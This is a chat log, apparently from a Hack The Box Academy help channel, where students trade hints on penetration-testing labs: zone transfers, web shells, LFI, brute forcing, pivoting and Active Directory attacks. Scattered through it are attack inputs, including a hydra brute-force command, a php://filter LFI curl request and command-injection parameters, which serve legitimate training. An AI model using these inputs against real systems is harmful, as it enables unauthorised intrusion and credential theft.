someone to help with AD Enumeration and Attacks Skills Assessment II? ||lazagne isn't dumping the cleartext creds on SQL01||
What sub-domain are you targeting and what wordlist are you using?
Why are you doing a bruteforce on internal when you can axfr? What other sub-domains are there?
dc1, dc2, mail1, ns, vpn, ws1, ws2 and wsus @knotty quest
I mean sub-domains of inlanefreight.htb, go back a few steps and look again
app and dev
Start from there
ty I got the answer
hey, I have a meterpreter shell open on my target machine, but it does not do many Linux commands like "sudo" "curl" "wget". am I missing something?
type help
a doh. Thanks.
Hey guys!
Is there a list that shows HTB boxes that are related to the modules?
thank you!
Hi. I hope you don't mind answering a question about the module: Attacking Common Services Easy
I was able to upload a web shell but can't get a reverse shell. I can only execute whoami and dir commands
I also uploaded a base64 encoded powershell reverse shell but when I go to the file location in the browser, it just displayed the base64 encoded string. No reverse shell
I could help you with that; might want to enumerate and brute force the SMTP service
anyone on that can give me a nudge on the AD Enumeration and Attacks Skills Assessment 1? I'm on the 4th question
Submit the contents of the flag.txt file on the Administrator desktop on MS01
found the svc_*** credentials. Tried a few pivot techniques, like using netsh, unsuccessfully trying to set up a WinRM session in the PowerShell webshell,
I have already done that. I was also able to use mysql to write files. I just can't get a reverse shell.
I wasn't able to get a full blown reverse shell but a php webshell can get r done
Yes, I was also able to upload a web shell but can only run a few commands such as dir and whoami. I just need a little nudge to how to get a shell or read the flag.
you can kind of navigate using just the dir command + absolute paths once you find the flag use the command <type> + absolute path to read the flag
I tried already using Burp but the output was blank. I'll give it another try. THANKS
I just want to know if there is a proper way to get a shell.
sure there is but I just uploaded a php webshell via the sql server and navigated to the flag and read it.
similar method to the "curling" box in hack the box
I tried to use "dir C:\Users" but didn't get anything back.
I don't have subscription to HTB. I just have access to the Academy.
if you still need more help you can dm me
Hi, I'm doing the Footprinting module, and I have to do the following:
Identify if it's possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...})
The thing is when I execute
dig axfr inlanefreight.htb @<target-ip>
I found these three TXT records
;; global options: +cmd
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb. 604800 IN TXT "MS=ms97310371"
inlanefreight.htb. 604800 IN TXT "atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
inlanefreight.htb. 604800 IN TXT "v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_sp
But tried all of them as the answer, and with the format it specifies, but it doesn't work. Any ideas?
What I find strange is that the task is submitting "the" TXT record, so maybe I'm doing something wrong in finding three of them
Yes, but the message is about the public key. I don't know how to convert my password into a key.
DNS section ?
You could try with another internal zone
Yes, section 1069
How can I do that?
Check what zones are available
favorite module so far
Cg
tx
The intranet chapter is really expensive, requiring 2500 modules
Can someone spot the mistake here? I've made many modifications to the payload trying to make it work, I even tried just copying and pasting it and still got nothing. I'm just reviewing this module, I already completed this practice in the past and I don't remember having any issue with it
It’s supposed to be like this
Did you figure it out yet?
You can't. Store what you have found and keep enumerating. What other programs are there? Have the credentials been re-used for any other accounts etc? It isn't always going to be as simple as find something and you are in.
hello guys I have a problem with: The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt
I can't get the flag, can somebody help?
Module: LOGIN BRUTE FORCING
Page: 11
Problem: unable to crack FTP (task 2)
Once you are in, you should find that another user exists in server. Try to brute force their login, and get their flag.
command: ||hydra -l g.potter -P rockyou-30.txt -u -f ftp://127.0.0.1 -t 4||
netstats: https://i.imgur.com/5Ps6clx.png
From what I read on the forum I should have a mistake somewhere in the IP address, but I don't know where
which section ?
hide the spoiler
dm me your command, errors and whatnot
what error do you get?
no error, just I can't crack it
I think I'm targeting the wrong IP but I don't know which I should target instead
you're talking about the skills assessment right?
yes, part 2, task 2
and you're using the wordlist provided?
yes
rockyou-30 located and run on the ssh target
okay that's weird then
why?
well I don't see any reason why your command wouldn't work
dm the password for the first user, I don't have it in my notes
I'll try and tell you if it works for me
In Attacking Common Services Lab - Hard is it normal that the only service I am able to ||bruteforce is MSSQL||? I'm guessing that's how the lab is designed but I tried the ||password list gathered from the previous lab (since it's the same user), the mutated password list from the previous module (which worked on a few occasions in this module) and rockyou|| and the ||user with or without @inla...|| and so far not a single result. What I'd like to know is should the other services ||be bruteforce-able as well and should my MSSQL bruteforce ||have given me a result?
does anyone know how to hack into others' accounts?
idk hacking, I need help with something
Hey, can somebody help me with the IMAP/POP3 section of the Footprinting module? I could not find the admin mail address. I tried to login as robin via openssl but can't FETCH anything there
Am I missing something? I am working through the Pentesting Career Path and the IPs have been incorrect in Service Scanning and Web Enumeration. Am I not supposed to be following the text and finding these myself?
The IP in the skills assessment isn't working?
Correct. So if I am doing this the host is not there. For the last one it said the IP was 10.129.42.253, yet it was .254. I only found it using an nmap scan of the subnet and guessing. I nmap'd the 10.10.10.0/24 and found nothing that would be close to the screenshot though.
You need to replace the IPs in the terminal screenshots with the IP of the target you spawn below.
So those are just examples and the IPs in the screenshots and throughout the sections are probably not active
For better explanations of how to go through the modules and complete them check out the introductory ones like "Penetration Testing Process" and "Getting Started"
https://academy.hackthebox.com/module/details/90
https://academy.hackthebox.com/module/details/77
Okay, thanks.
Okay, I see what you are talking about now. Thanks!
Hi, I can't SSH into Parrot Linux.
SSH to 10.129.121.238 with user "htb-student" and password "HTB_@cademy_stdnt!"
It doesn't work!
ssh -l htb-student -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" 10.129.121.238
Permission denied, please try again.
sure, I can reach the SSH port but I can't authenticate.
it worked after I just typed the password and not copied it!!
hello I got stuck with PHP wrappers, I can't read: Try to gain RCE using one of the PHP wrappers and read the flag at /
https://academy.hackthebox.com/module/23/section/253
Can somebody help ?
yes for the other services and no for the service that you currently brute forcing
for the last question you can follow this https://donsutherland.org/crib/imap but for that question I ended up having to put the picture together for the admin mail address (the only thing you'll really need is the username)
for RCE you can just follow the example shown under Remote Code Execution
I can execute the command id and it gives output but how can I read the flag at / ? cat /flag as a command
cmd=pwd returns working directory
/var/www/html but I don't know how to add a command for example 'ls -al /'
sorry for the delay but I just gave it a try and that command works just fine for me
I have used robin:robin credentials and logged in via openssl but there are no messages in the inbox. am I on the right track at least
cmd=''ls -al /''
can you write the command ?
I'm giving that section a check right now but yes
I don't need to re-encode the php cmd payload thing, I just need to put the command at the end
also you can't use quotes for Linux commands
I'll give it a try
I don't remember exactly the number but there should be ||multiple mailboxes|| and one of them is the right one with some stuff in it
yeah you don't need to send me this also for the love of god pls remove spoiler (the flag name)
i got the flag
thank you for the assistance and help, all i needed was a little bit of a push
and you will get another one from mods if you don't remove the flag name
there is a reason the flag isn't named flag.txt
i removed the flag name 😉
Hey guys can someone help me or give me a nudge for the TLS SSL Assessment. I can decrypt the cookie but I am unable to craft the Admin cookie. Tried a few things
Hi, how can I read email in IMAP? I try but I can't. I'm stuck in the Footprinting hard lab.
That can happen depending on the paste keystroke you hit, could be adding additional characters
the Windows foothold machine on the AD module is laggy asf, I can't even open a cmd prompt. is there any way to fix that?
Active Directory Enumeration & Attacks
Credentialed Enumeration - from Windows
Q: What is the password for the database user?
I got a password from the config file but it's not working, any hints will be helpful.
make sure you are correctly copying it and pasting
worked thanks
For terminal to paste you need to do [ctrl+shift+v]
Remember, IMAP is a file directory structure so first you need to select a specific folder to see the email
So I finished windows fundamentals.
I learned somethings here.
I had a migraine.
Drank 2 cups of coffee.
Got frustrated to the point where I wanted to break something.
But I got it done.
I'm doing the Skills Assessment for "Attacking Web Applications with Ffuf". The 2nd question asks about file extensions, and I'm confused about the answer it accepts. One of the extensions the question expects for the correct answer only responds with 403s. Why would this be considered an extension accepted by the webserver?
Look into what a 403 status is
Doesn't 403 Forbidden imply that the webserver cannot accept the request, while 401 Unauthorized implies that it can accept, but needs authentication? What am I missing?
403 means it exists but as an anonymous/not authorized user you can't access it, so that's why it's accepted
It accepts your request to view the page but tells you, you aren't allowed to see it
I'd be more concerned if it said 404
/etc/passwd isn't a privilege file, but there are also just command line things you can do
whoami /priv
Hi, I am stuck on Broken Authentication - Skills Assessment. I have the users with country extension and their passwords, I decrypted the htb-sessid cookie, I have htb_sessid_persistent. But I don't know how to escalate privileges or discover the admin module
What module is this related to?
And the module didn't talk about anything you can try?
Hi gang, need some help.
Am currently on the Footprinting hard lab
Able to log in as Tom to the IMAP service and select his inbox. When I try to get the content I run into a wall. Have tried "1 FETCH RFC822" and I get a BAD error
nvm
figured it out
used wrong fetch command
Someone once told me, "No matter how good you are with a computer, there's never gonna be a day where you don't want to light your computer on fire and push it off a cliff laughing maniacally."
File upload attacks - skills assessment. Can I get a hint about how to read upload.php?
Hey, I just noticed that the time left counter on my target VM is going down WAY too fast
like, I'm losing a minute every 15 seconds or so
That timer has no bearing, you still get the full like 90 minutes
Thanks! Maybe it was some Javascript weirdness
Hi team, I need help for Pivoting, Tunneling, and Port Forwarding - Skills Assessment. What do you recommend to transfer files from a Windows machine to my attacker one or vice versa?
Anyone had issues with module PIVOTING, TUNNELING, AND PORT FORWARDING section RDP and SOCKS Tunneling with SocksOverRDP exercise ? The host 172.16.6.155 doesn't seem alive.
When a module has a length of 2 days or any number of days, is a day defined as 12 hours or 24 hours?
reload the vm if you have connection issues, for me everything worked well
3-4th try reloading it and was even waited like 20-30ish minutes to let everything boot up correctly 😦
The easiest way is to log in with xfreerdp. Then you can simply mount a share drive.
Otherwise, set up an SMB share on your VM.
thx I found the solution with the /drive option
One day is calculated with 8h.
Personally, I find these time indications difficult. It all depends on how much you know about the topic. Depending on that, you need longer or shorter.
Thank God
Same tbh, I am a slow reader so I feel pressured by the time indications "Damn it, I was supposed to finish this 5 hours ago"
But it is generally helpful for planning ahead. Overall, I'm glad they're there
Don't let yourself be pressured. It's okay if you need more time.
Many people here have always asked about the duration and HTB has responded by defining a time for each module.
I don't think I have kept to this time for a single module. Sometimes I was faster, sometimes I was slower.
Thanks! You too
File transfer modules, when they talk about upload vs download, is that in context of the target machine? Upload files from the target to the attack host and download to the target from the attack host? or upload to the target from the attack host and download from the target to the attack host?
Not entirely
You can also upload to the attack host from the target
Context is mostly within the question
so it can vary from question to question, when looking at LOLBAS it says download and upload, is that generally from the target machine perspective? upload / download, from/to the target?
But for simplicity sake: when referring to download, they are generally meaning move file from attack machine to target. Upload will generally mean from target machine to attack machine
The module itself walks through many different scenarios
Module: osTicket
Find your way into the osTicket instance and submit the password sent from the Customer Support Agent to the customer Charles Smithson.
I'm stuck here. Anybody help me ?
Found it. Thanks @rustic sage
In the module, two usernames are mentioned in the section "osTicket - Sensitive Data Exposure". Log in with one of them and read the existing tickets.
Can someone dm me i need help with something it's personal
If it's in regards to hacking a service for you that's highly illegal, even if details are discussed in DMs. #rules
Hey all, just did the easy lab for Attacking Common Services. There's a hint after getting the flag that says that there are two ways of solving this. If anyone who did this already is willing to discuss it, please DM me! Thank you
Anyone else having issues with the assessment for the information gathering web edition module? I can't get the 3rd question because it appears that the i.imgur site is down.
If it is only about that, then not
#modules message
If it's for help with one of the modules, just post your question here and I'm sure someone can help you out
Never mind. I figured out that I already had the answer for the 3rd question.
Can anyone help? I'm attempting to intercept a web request with OWASP ZAP. The port number is correct, but I cannot access the page with the proxy on and intercept turned on; I can access it without them turned on, and when I try to refresh the page after turning them on, the page just loads indefinitely. It is the same whether I do this in Pwnbox or my own VM. I've seen quite a few people asking the same thing on the web but have not seen it resolved anywhere. This is the Using Web Proxies module, Intercepting Web Requests.
Because the proxy intercepts the web request, you need to click "forward" in the proxy application to step forward in the next part of the chain
That's how the proxies work
If you're intercepting a web request it's terribly inconvenient if you have to time it just right
@fathom pendant I did that and it unset the break and the website is still trying to load
try continuing to hit forward until it loads/you see what you're trying to see; I'm sure the module tells you what to do ¯\_(ツ)_/¯
I try to list all environment variables with env or printenv, but it just shows me the binary /usr/bin/env... any idea what's going on?
Anyone available for sanity check on why war file is failing on tomcat?
is there a test for the linux fundamentals
like at the end of the module
to say you know it
Hi all, I'm struggling with Host3 for 'The Live Engagement' within Shells & Payloads as it has port 445 closed. [However it is suggested I have to use a specific exploit that would target SMB]. Can anyone help me out please and confirm if this is expected?
Usually most modules will have a skills check
Yes
Ref my above post/comment, please let me know if it's the right place to ask that Q
I had no issues with it give me one moment
On the shells and payloads module, I’ve tried using both the 172.16.1.x and the 10.129.227.x IP addresses, and I cannot get a shell to catch. I know it’s something stupid simple that I’m overlooking, any help appreciated.
Thanks for looking into it. The only port open on Host3 for me (at least about 10 mins ago) was RDP / 3389. So could not get the SMB exploits to work haha!
You’re doing the same module as me. Can you give me a quick nudge?
I'm stuck on (Attacking Common Services - Hard)
got rdp & sql & impersonate & linkserver name
I'm stuck at enabling commands
"A system administrator can enable the use of 'xp_cmdshell' by using sp_configure."
need some help
solved 💯
sorry for delay had to troubleshoot my vm; bridged adapter was being dumb
gonna rerun that one
ah right; the host-3 hint seems to indicate something else
not smb
but something that may remain eternal
but yeah that should get you your answer
not sure where you were getting hints that SMB was going to be the way in; can you elaborate where you got that hint? cause nothing on the hints on the page seem to indicate anything
How long did it take you guys to finish pentester path?
it's different for everyone tbh some people have a lot more spare time and can complete the path in half the estimated time (~41 days estimated) some people take longer it's a big mixed bag
if you are in the Login Brute Forcing module hint check your parameter
same as MarcieLee i would say a bit over 1 month if you don't procrastinate
huh... somehow my resolv.conf file got yeeted
lol when i did sudo vim on it... it just had the default
lol the server side attacks skill assessment must have been the easiest one of all the modules I've done so far
no sorry
I'm new to Discord
I found it when I was trying to get free v bux
are you there 😦
never mind I figured it out
yep I am dumb, I was doing PtH wrong :^)
this place is for conversations about the #modules found on https://academy.hackthebox.com ; to gain access to more of the server you need to verify your https://app.hackthebox.com account using the instructions from #bot-commands and typing the ++verify command in there.
@graceful rampart once I got the ball rolling i had no problem with Julio in the PtH section WOO; it all comes down to "I did the thing wrong" (also cmd being dumb)
any recommendation on a stable pivot method (also port forwarding) through the old Windows 7?? not all C2s can do this and the few that can are like super unstable
this discord is for hackthebox platform content if all you want is free v bux and think spamming will help, pls kindly F off
Reason: Bad word usage
yeah not sure why all these kids keep getting on this channel
because it's the only set of channels that's not role locked behind verification
because some people are just interested in the academy and not main platform
oh no i mean the kids and spammers, not the people interested in learning
that's the base reason
the kids and spammers are an unfortunate side effect of these
i mean there are a couple of channels that you can access without verifying, no idea why this is the channel they always go on first
because it's the most active
fair. i didn't even think of that
He got the 👢
Ugh I think I'll call it a night and work on PtT tomorrow LOL spent a few hours just troubleshooting why my system decided to say "no thanks" to having a dns
so I didn't get as much done today as I wanted
Chat cleaned 🙂 ❤️
<3

does anyone know how to loop over the content of a .txt file in bash?
I've been trying for w in /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt but that just sets the filepath as w
nvm found a way
for x in $(cat file); do <command>; done
Where you'd insert $x where appropriate
yeah i did for read p.[...];done < file.txt
Though most things that make use of wordlists have an option to just do the wordlist
Instead of needing to write a loop
Usually indicated by the opposite letter case i.e. -l, -L
@vital adder @fathom pendant Thank you guys. Just completed IMAP/POP3 after the hints you provided
Np the things related to mail server enumeration I'd advise just installing a mail client so you can sign in with creds without having to fight protocols :)
But doing it the long way def helps reinforce things
oh yeah forgot to respond to your dm, sorry about that
NP
has anyone done the broken authentication module? I'm having a problem with bruteforcing usernames, question 4
he just discovered the new voice AI thing and is hoping someone will pay him $97 for a (i think) free tool
I think it's free, openAI
Please be more descriptive with the issue you're having
I issue the command
curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
and this is the output
<b>Warning</b>: include(): Failed opening 'php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini' for inclusion (include_path='.:/usr/share/php') in <b>/var/www/html/index.php</b> on line <b>47</b><br />
I tried to change the path to /usr/share/php but it throws more errors
So you added include_path=
Also what's the module name? Don't feel like clicking link;
I'd say first check notes to see if there's something you overlooked
Remote File Inclusion (RFI)
i have to verify the RFI
Try including URL within URL
Hey @fathom pendant Eternal Blue is an SMB based exploit, so if port 445 is closed it will not work right? I think that's why my attempts failed so far 😦
Anyway it might have been an issue with Host3 yday as today port 445 is open on it! Thanks for helping me though
Seems like you had a long night 😄
Yeah I didn't really enum 445 too hard I just kinda went through the stuff gone over in the module
try inserting the same url after the language= and try this in the browser
hey guys, can someone help me with how to save the /etc/passwd after editing it, I am using vim
Why are you editing /etc/passwd?
I am trying to get rid of the root password so I can enter root without the need to input a pass
That's... That's not how you do that
that's what they are showing in Password Attack module -- section Passwd, Shadow & Opasswd
Also to edit /etc/passwd you need to do the edit command with sudo
If you're on the actual question: just follow the lead on unshadowing
Hmm..ok so SMB port is open. But i've tried all 'Eternal' exploits and none of them succeeded in giving me shell. Is there something I'm missing? (i've set all required options as well)
Also easier if you do sudo passwd. I forget the full command if there's more, but the built-in passwd command lets you do it in a safer way
Did you remember to change the LHOST to its internal 172.x.x.x address?
Got it, thanks a lot
Good shout, let me check with 172.*
Hi, I think I need a little tip for: https://academy.hackthebox.com/module/23/section/1494
I found the ?xxx= parameter to use the LFI.
I can read many files including|| /etc/apache2/apache2.conf|| and ||/etc/apache2/envars||.
But since I don't know Apache, nothing jumps out at me, and I can't find any accessible .log. Can you give me some advice? Am I on the right path?
Google where these log files may be
All good now, thanks Marcie, you are a legend!
this is the first thing I did, but I must have my nose on it, because I don't see... 😭
did anyone manage to get the password for the user Kira in Password Hunting for Linux section? I am kinda stuck there although I used the hint pass and applied the mutation to that password but never got a hit on the ssh service
hint: enumerate a different service
can I dm you?
Also enumerate with "kira" not Kira
if you mutated your password with the custom.rule then you should be fine
oh, if that's the case, then I have the answer, I only have the problem with capital K
Yeah ignore the capital, use lowercase
much appreciated
I have question regarding password attacks module and the section is Linux creds hunting, my question is how can I find the password for Will? I have brute forced the kira and dont have a clue what can I do next, I am really stuck I have checked config files and so on
It used an older version of PHP i got the flag
Always bake a || Lazagne ||
Hi, can anyone guide me which modules should i complete first to prepare for "attacking enterprise networks"?
Actually all from the CPTS path
cpts path is very pricy !
Yes, but the module "Attacking Enterprise Networks" is kind of a summary of all the modules in the CPTS Path. It serves as preparation for the exam
Hi, I am stuck at Skills Assessment - File Inclusion, I found the admin page and am able to read /etc/passwd, but no idea how to get rce. Can someone give me a hint?
Have a look at the || access log || 😉
is anyone able to help me with Responder?
im having lots of issues with solving the hash im provided, i know what it is supposed to be when it's solved but ive tried using john and hashcat to solve it and neither of them work, even if i spoon feed them the answer in a .txt nothing turns up any results and they both just give up
ive tried them both with some md5 hash(es) and they worked just fine, im not sure why they will not work to solve the NTLMv2
Doesn't sound like a problem with responder. Have you tried just using pwnbox? The machine you ssh in to also has hashcat, just copy the relevant hash in to a new file and follow the course material.
You can't take the exam without finishing the entire path anyway, so there isn't really a choice there. If you just want to test your abilities, then you can always just unlock that module and then find where you get stuck and review those sections, that will probably cause you more frustration though 🤷♂️ . There are no real shortcuts in cybersecurity.
can i dm anyone for footprinting hard lab?
You can write to me
hi i have a question. i am at the moment stuck at a question in the INTRODUCTION TO WINDOWS COMMAND LINE module at the skills assessment, on the question with user7. For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them. I have been able to successfully authenticate to the target host and i am trying to connect through ssh to the domain controller, which i think is greenhorn.corp, but i can't get in with the pw of the flag before. plz help.. what am i doing wrong
Do a "whoami" command
hmm
well that helped lol
thx
lol yes xD
:)
so ... I need to lookup the ip of paydiant.com for "information gathering - web edition" but the problem is that it appears that there are no longer dns records for that domain ...
Heya, anyone available for a quick DM for Footprinting Lab Hard? I think I am on the right track, but I can't for the love of it figure out what I am doing wrong and get no output for my scans.
sure, DM me
I am struggling pretty hard with the File Inclusion Skills Assessment. I have found the ||admin panel|| and can read ||/etc/passwd|| but I cannot for the life of me figure out how to proceed. I can't seem to execute any commands to find the flag. It's driving me insane. Any help would be appreciated.
Have a look at the || access log || 😉
hey im trying to view the python3 server but this keeps happening, i have tried to google it but i am getting nowhere, can anyone help
Hmmm. How would I access it? When I try|| index.php?log=access.log || the line is blank
The ||access.log ||is not in the same directory. You can write me a DM if you need help
404 not found focus on that
Ahh okay. Will do, thanks!
ok so i see it cant find readme.html.. so does that mean when i put into my script python3 -m readme.html
hey everyone, im having some issues with crackmapexec when trying to use it in the attacking common services smb module - says im missing the aardwolf library for crackmapexec. is this something i can use apt or apt-get for or is there another update method i need to follow? this is on parrot.
I'm pretty sure there isn't such a mode (library) in python with the way you have specified it
so im following the linux fundamentals and it shows me this python3 -m http.server
then shows me a pic with a link that has localhost:8000/readme.html
i also used pip to check if its missing this dependency, it says its fine
pip install aardwolf
So can anyone help me with the ip of paydiant.com? The name seems to be no longer registered 😦
wow i just had to remove readme.html..
sometimes i surprise myself in how dumb i am
tried this, errored out and said it was already satisfied
crackmapexec still not working though
ill try updating crackmapexec itself maybe
maybe pip3 install aardwolf ?
yeah
uh oh
i tried pip3 install aardwolf and --upgrade
neither worked
then tried updating crackmapexec itself
i broke it i think
cme?
the pwnbox has crackmapexec pre-installed; use sudo cme to run it, but if you install some other stuff like you did it could mess with the pre-installed cme
ok when i run with sudo it goes back to saying aardwolf is missing again
let me try a couple things
to try with a new pwnbox instance
It really seems to be unregistered.
@west canopy Can you take a look at it and adjust the module if necessary?
yes the paydiant.com website no longer exists we are updating the question soon just a matter of what website we want to change it to
damn haha, was hoping on finishing all cbbh labs this weekend to book the exam
Look in your DM. I have sent you a printscreen
is there any way for someone that already answered a question to answer it again when it gets updated? because for me when a question gets updated the answer is still stuck on the old one (the last time i checked it is)
yep this answer is for the old question
In this instance then would we be alright with (DM) the answers until it gets updated? Or at least in the meantime have it updated i.e. a hint/note that says something about it
yes that is fine*** lol
ill look into it
hey folks, attacking common services - DNS , is this task bugged or something? subdomain busting is taking ages and not finding anything, tried each possible method out there, any nudge?
Why are you subd busting?
it's so confusing when helping people, and thank you for your service
that's what we should do, no ? with subbrute / gobuster DNS
it's recommended to use the tools shown in the example (it will save you some time and have an auto "sanity check"); forgot subbrute was the tool shown in the example
that was fast